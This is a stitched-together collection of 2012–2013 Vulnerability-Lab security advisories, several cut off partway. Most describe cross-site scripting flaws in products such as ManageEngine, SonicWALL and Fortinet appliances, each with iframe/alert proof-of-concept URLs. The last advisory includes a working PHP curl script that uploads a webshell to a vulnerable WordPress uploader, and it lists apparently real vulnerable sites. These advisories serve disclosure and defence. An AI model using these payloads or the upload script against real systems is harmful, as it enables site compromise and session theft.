or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user
iDev Rentals v1.0 - Multiple Web Vulnerabilities
will be executed. URL: http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=categories 1.3 The remote attacker can add packages to inject own malicious persistent script code, iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in the fields package name or package description When a user is processing to view the packages listing, the malicious script code will be executed. URL: http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=add_package Risk: = 1.1 The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)
Title: == Akeni LAN v1.2.118 - Filter Bypass Vulnerability Date: = 2012-11-14 References: === http://www.vulnerability-lab.com/get_content.php?id=761 VL-ID: = 761 Common Vulnerability Scoring System: 3.3 Introduction: = Akeni LAN Messenger is an IM system designed for your LAN. It is easy to setup and does not requires a dedicated server or Internet connection. The rich client support chat, notification, conferencing, and file transfer. For those who also need authentication and encryption, please take a look at our Expert and Pro products. If your organization needs a web based solution that requires no client side installation of software, please take a look at our Web Chat. Due to the peer-to-peer nature of the product, there is no single point of failure and there is no need for any network setup. This make Akeni LAN Messenger a good solution for dynamic environment where two people can communicate with one another as long as the network itself is up and running. For example, LAN Messenger can be used by IT support personnel who needs a way to communicate and send files with each other anywhere in their network easily, without the need to connect to the Internet or to a centralized server. (Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php ) Abstract: = The Vulnerability Laboratory Research Team discovered a filter bypass software vulnerability in the official Akeni LAN (LE) Messenger v1.2.118. Report-Timeline: 2012-11-14: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Medium Details: A filter bypass software vulnerability is the detected in the official Akeni LAN (LE) Messenger v1.2.118. The bug allows local attackers to inject own malicious persistent script codes on application-side. The vulnerability is located in the Akeni `incorrect length` exception-handling module with the bound vulnerable groupname (Gruppenname) parameter. The filter of the Akeni LAN Messenger santizes malicious tags and evil frame context but does not recognize a secound splitted (%20) request after the first. The attacker can provoke a first parse by injecting for example a `` to match the invalid exception criterias. After the provoke he splits the request with %20 and inject his own tags directly after it. The result is a persistent script code execution out of the invalid length invalid parameter software exception-handling. Vulnerable Module(s): [+] Menu Action Contact List Add Group Vulnerable Parameter(s): [+] Incorrect Length - Exception-Handling [+] Invalid Context - Exception-Handling Proof of Concept: = The vulnerability can be exploited by local attackers without required user inter action. For demonstration or reproduce ... 1. Let us watch the exception-handling of the invalid length. First we inject a standard iframe like iframe src=a ['] has incorrect length. Groups name must have between %2 and %3 characters. ... the validation of the incorrect length or invalid parameter redisplays the message but parse the iframe tag. We can see in the parse the which is splitted from the parse itself and shows is there could be an injection possibility. 1.2 The next step will be to split the request. HOW?! We inject a standard iframe (iframe src=a) split the request with %20 (Space) and inject the secound script code after the split. PoC: String: iframe src=a%20img src=http://www.vulnerability-lab.com/gfx/logo-header.png --- Exception Logs (Bypass) --- [] has incorrect length. Groups name must have between 30 and %3 characters. Risk: = The security risk of the local persistent software vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com
Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites
=alert(VL)/ When the user browses the alarms page in the control panel the persistent injected script code will be executed out of the web application context. 1.2 PoC: http://exchangereporterplus.127.0.0.1:8080/exchange/ReportsIndex.do ?selectedTab=reportsreportCategoryID=3+iframe src=http://www.vuln-lab.com onload=alert(VL)/iframe The attacker can go to reports and insert own malicious script code inside of the search report box to exploit the service application. Risk: = 1.1 The security risk of the persistent input validation vulnerability is estimated as medium(+). 1.2 The security risk of the client side cross site vulnerabilities are estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities
Title: == SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities Date: = 2012-11-19 References: === http://www.vulnerability-lab.com/get_content.php?id=549 VL-ID: = 549 Common Vulnerability Scoring System: 3.5 Introduction: = Tapeless Enterprise-Level Data Backup and Protection, Without the Price Tag. Automatic, real-time data backup for servers, laptops and PCs. Features include file versioning, fast data recovery, and automatic offsite backup capabilities to protect businesses against disasters. SonicWALL® Continuous Data Protection (CDP) v6 is a next- generation data backup and disaster recovery solution that automatically preserves and protects business-relevant data assets against loss from file, device, and location based disasters. With support for Windows®, Linux® and Mac OS® through a single Web GUI, CDP provides granular, globally enforced policy controls over the entire backup operation. Unmatched flexibility enables IT administrators to dictate what information to backup, what to exclude and how the information should be maintained to adhere to recovery and compliance requirements. A sophisticated new fileset backup methodology combined with agent-based data de-duplication moves and stores only unique data blocks. This speeds the backup process and optimizes bandwidth usage while maintaining total information continuity and the ability to flexibly restore multiple revisions. SonicWALL Continuous Data Protection v6 offers the comprehensive data protection organizations demand and the power administrators need for vigilant data backup and disaster recovery. (Copy of the Vendor Homepage: http://sonicwall.com/emea/backup_and_recovery.html) Abstract: = Vulnerability Lab Research Team discovered multiple Vulnerabilities in SonicWalls Continuous Data Protection v6.x 5040 appliance application. Report-Timeline: 2012-05-04: Researcher Notification Coordination 2012-05-08: Vendor Notification 1 2012-08-10: Vendor Notification 2 2012-08-16: Vendor Response/Feedback 2012-11-01: Vendor Fix/Patch by Check 2012-11-19: Public Disclosure Status: Published Affected Products: == SonicWall Product: Continues Data Protection GUI v5040 6.0.x Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in SonicWalls Continuous Data Protection v6.x 5040 appliance application. The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious persistent script code on application side of the appliance application. The vulnerabilities are located in the network, accounts management and system settings modules with the bound vulnerable label delAppl (name, username servername) parameters. An attackers can inject script code as name, username or servername via add function to manipulate the vulnerable module with malicious persistent web context. The persistent script code will be executed when the victim is processing to watch the vulnerable module listing (output|index). Successful exploitation of the vulnerability result in session hijacking (customer/manager/admin) or stable (persistent) module context manipulation. Exploitation requires low user inter action and a low privileged web application user account. Vulnerable Module(s): [+] Network Settings [Name] [+] BMR Accounts [Username] [+] System Settings [Server] Vulnerable Parameter(s): [+] label delAppl - Name [+] label delAppl - Username [+] label delAppl - Servername Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attackers with local low privileged user accounts and low required user interaction. For demonstration or reproduce ... Review: Network Settings ADD [Name] - label delAppl - Name label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/tdtd class=tableLineContrast name=ipspanlabel for=delAppl_0 192.168.150.216/label/span/tdtd class=tableLineContrast name=netmaskspanlabel for=delAppl_0 255.255.255.0/label/span/tdtd class=tableLineContrast name=gatewayspanlabel for=delAppl_0 192.168.150.1/label/span/tdtd class=tableLineContrast nowrap=a class=swlEventEdit href=# title=Edit Entryimg class=actionIcon width=20 height=20 border=0 alt=Edit this entry src=images/edit.gif//a/tdtd input type=hidden name=itemId value=undefined/input/td/tr/tbody/table/iframe/label Review: BMR Accounts [Username] - label delAppl - Username label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/tdtd class=tableLineContrast spanlabel for=delAppl_0
ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities
Title: == ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities Date: = 2012-11-15 References: === http://www.vulnerability-lab.com/get_content.php?id=689 VL-ID: = 689 Common Vulnerability Scoring System: 3.5 Introduction: = ServiceDesk Plus integrates your help desk requests and assets to help you manage your IT effectively. It helps you implement ITIL best practices and troubleshoot IT service requests faster. ServiceDesk Plus is a highly customizable, easy-to-implement help desk software. More than 10,000 IT managers worldwide use ServiceDesk Plus to manage their IT help desk and assets. ServiceDesk Plus is available in 23 different languages. (Copy of the Vendor Homepage: http://www.manageengine.com/products/service-desk/) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in ManageEngines ServiceDesk v8.0 Plus. Report-Timeline: 2012-11-15: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in ManageEngines ServiceDesk v8.0 Plus web application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Two vulnerabilities are located in the my details and request new incidents module of the web front-end with the bound vulnerable name, subject and description parameters. Exploitation requires low user inter action low privileged customer web application user account. The secound part of the bugs are located in the New Contract, Access points and Create Solution module of the admin/moderator back-end with the bound vulnerable title, asset name, contract name, description or support name. Successful exploitation of the vulnerability can lead to session hijacking (customer/manager/admin), persistent phishing or stable (persistent) web context manipulation. Vulnerable Module(s): Customer/User/Moderator Front-End [+] My Details - [Name] [+] Requests - New Incident - [Subject] - [Description] Vulnerable Module(s): Admin/Moderator Back-End [+] Solution - Create Solution - [Title] [+] Assets - It Assets - Access points - [Asset name] [+] Contract - New Contract - [Contract Name] - [Description] - [name] - [Support] Proof of Concept: = The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action low privileged user account. For demonstration or reproduce ... The vulnerability in the Requester account can be exploited by many different methods. The first attacking vector can be launched by creating a request and injecting a malicious code in the subject and description field of the request. When the victim views the requests and stops by the mouse courser on the request name. The code gets executed in the small pop up window that contains the Subject and Description information of the request. Another way to attack the admin is to edit the details of the requester account and inject the malicious code in the field Name. After that, the attacker creates a request. Once the admin views the requests, the code gets executed in the field of the requester name. Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com
FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability
/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C Solution: = The vulnerability can be prevented by parsing the java number format exception output listing mkey application value. 2012-10-24: Vendor Fix/Patch Risk: = The security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (rem...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities
Title: == FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities Date: = 2012-12-01 References: === http://www.vulnerability-lab.com/get_content.php?id=702 VL-ID: = 702 Common Vulnerability Scoring System: 2.1 Introduction: = FortiWeb web application firewalls protect, balance, and accelerate your web applications, databases, and any information exchanged between them. Whether you are protecting applications delivered over a large enterprise, service provider, or cloud-based provider network, FortiWeb appliances will reduce deployment time and simplify security management. Fortinet s FortiWeb™ has passed ICSA Web Application Firewall Certification. The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are evidence of FortiWeb s commitment to uphold the industry s highest security standards. Achieving this certification ensures that FortiWeb™ customers benefit from best practices in the security industry for all their Web application needs. (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in Fortinets FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. Report-Timeline: 2012-10-01: Researcher Notification Coordination 2012-10-11: Vendor Notification 2012-10-05: Vendor Response/Feedback 2012-11-11: Vendor Fix/Patch 2012-12-01: Public or Non-Public Disclosure Status: Published Affected Products: == Fortinet Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance Exploitation-Technique: === Remote Severity: = Medium Details: A non persistent cross site scripting vulnerability is detected in Fortinets FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C Virtual Appliance. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with low or medium required user inter action and without local privileged application user account. The vulnerability is located in the Regular Expression - Validation (pcre_expression/validate) module with the bound vulnerable redir and mkey parameters. Successful exploitation results in client side account steal, client side phishing client-side appliance module context request manipulation. Vulnerable Module(s): [+] Regular Expression - Validation Module (pcre_expression/validate) Vulnerable Parameter(s): [+] redir [+] mkey Proof of Concept: = The client side cross site scripting vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... Code Review: Regular Expression - Validation Module (mkey redir) trtd table class=footer cellpadding=0 cellspacing=0 trtd input class=button type=button value=Return onclick=if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'} /td/tr /table /td/tr input type=hidden name=mkey size=22 maxlength=22 value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) input type=hidden name=validated value=-1 input type=hidden name=redir value=/success /form /table /td ... or trtd table class=footer cellpadding=0 cellspacing=0 trtd input class=button type=button value=Return onclick=if (window.opener) {window.close(); } else {document.location='/waf/pcre_expression/validate'} /td/tr /table /td/tr input type=hidden name=mkey size=22 maxlength=22 value=0[CLIENT SIDE SCRIPT CODE EXECUTION!]) input type=hidden name=validated value=-1 input type=hidden name=redir value=/success /form /table /td PoC: https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/successmkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3Cmkey=0 Solution: = The vulnerability can be patched by parsing all mkey and redir success parameter requests of the vulnerable Regular Expression - Validation module. 2012-11-11: Vendor Fix/Patch Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers
Enterpriser16 LoadBalancer v7.1 - Multiple Web Vulnerabilities
failed the validation. br ' iframe [PERSISTENT INJECTED SCRIPT CODE!] ' is not a valid IP address. /em /p URL: http://loadbalancer.127.0.0.1:8080/lbadmin/config/physicaladv.php?mnp=editsubmnp=epat=1355527441l=e Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability
Title: == Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability Date: = 2012-12-20 References: === http://www.vulnerability-lab.com/get_content.php?id=792 Vendor: http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater VL-ID: = 792 Common Vulnerability Scoring System: 1.5 Introduction: = LogAnalyzer is part of Adiscon`s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux. The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line). (Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ ) Abstract: = An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the log analyzer v3.6.0 web application. Report-Timeline: 2012-12-20: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Low Details: A client side cross-site scripting vulnerability is detected in the LogAnalyzer 3.6.0 web application. The vulnerability allows an remote attacker with high required user interaction to force client side xss requests. The vulnerability is located in the asktheoracle.php file with the bound vulnerable oracle_query parameter request. An attackers can force client side requests to execute arbitrary script code by using the oracle_query parameter. Successful exploitation of the vulnerability results in client side execution of inject script, client side phishing, client side module context manipulation and evil unautorized external redirects. Vulnerable File(s): [+] asktheoracle.php Vulnerable Parameter(s): [+] oracle_query Proof of Concept: = The client side cross site scripting vulnerability can be exploited by remote attackers with medium or high required user interaction and without privileged application user account. http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstroracle_query=[CLIENT SIDE SCRIPT CODE!] Note: The 'oracle_query' parameter didn't sanitize properly for asktheoracle.php page. Solution: = Upgrade to the latest version of Log Analyzer 3.6.1 Risk: = The security risk of the client side cross site scripting web vulnerability is estimated as low(+) Credits: Mohd Izhar Ali - [http://johncrackernet.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory
SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability
. Risk: = The security risk of the persistent web vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Wordpress Valums Uploader - File Upload Vulnerability
Title: == Wordpress Valums Uploader - File Upload Vulnerability Date: = 2013-01-04 References: === http://www.vulnerability-lab.com/get_content.php?id=817 VL-ID: = 817 Common Vulnerability Scoring System: 7.5 Abstract: = The independent laboratory researcher (jingo-bd) discovered a remote file upload vulnerability in the Wordpress `Valums Uploader` application. Report-Timeline: 2013-01-04: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A file upload vulnerability is detected in the Wordpress `Valums Uploader` application module. The vulnerability allows remote attackers to upload files like webshells and co. to unauthorized access them after the upload to compromise the application system. The vulnerability is located in the valums uploader module when processing to request for uploads via POST. Attackers can unauthorized upload own files to compromise the web application or system dbms. Exploitation of the file upload vulnerability requires no user interaction and can be processed without privileged application user account. Successful exploitation of the remote file upload vulnerability results in system and dbms compromise. Vulnerable Module(s): [+] Valums Uploader Proof of Concept: = The remote vulnerability can be exploited by remote attackers without required user interaction and without privileged application user account. For demonstration or reproduce ... ?php $uploadfile=bangla.php; $ch = curl_init(http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php;); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=@$uploadfile)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print $postResult; ? Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php Reference(s): http://www.xxx.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php http://www.xxx.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php http://www3.xxx.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps Risk: 